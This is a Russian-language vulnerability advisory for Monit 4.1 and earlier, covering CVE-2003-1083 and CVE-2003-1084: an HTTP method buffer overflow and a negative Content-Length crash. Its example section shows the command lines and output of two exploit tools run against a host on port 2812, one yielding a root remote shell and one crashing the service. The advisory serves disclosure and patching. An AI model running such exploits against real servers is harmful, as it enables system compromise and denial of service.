Множественные уязвимости в Monit

Дата публикации:
25.11.2003
Всего просмотров:
978
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2003-1083
CVE-2003-1084
Вектор эксплуатации:
Локальная сеть
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Monit 4.x
Уязвимые версии: Monit 4.1 и более ранние версии

Описание: Две уязвимости обнаружены в Monit. Злонамеренный пользователь может вызвать отказ в обслуживании или скомпрометировать уязвимую систему.

1. Удаленный атакующий может представить чрезмерно длинный HTTP метод, чтобы вызвать переполнение буфера в HTTP интерфейсе. 2. Удаленный атакующий может посать HTTP запрос с отрицательным значением в поле "Content-Length:", чтобы аварийно завершить работу целевого сервера.

Пример/Эксплоит:

./xonya -t 3 -p 2812 192.168.3.12

Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:

Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit
$./donit -p 2812 192.168.3.12

Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.

$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused

URL производителя:

Решение: Обновите до 4.1.1: http://www.tildeslash.com/monit/dist/

Ссылки: Monit 4.1 HTTP interface multiple security vulnerabilities

или введите имя

CAPTCHA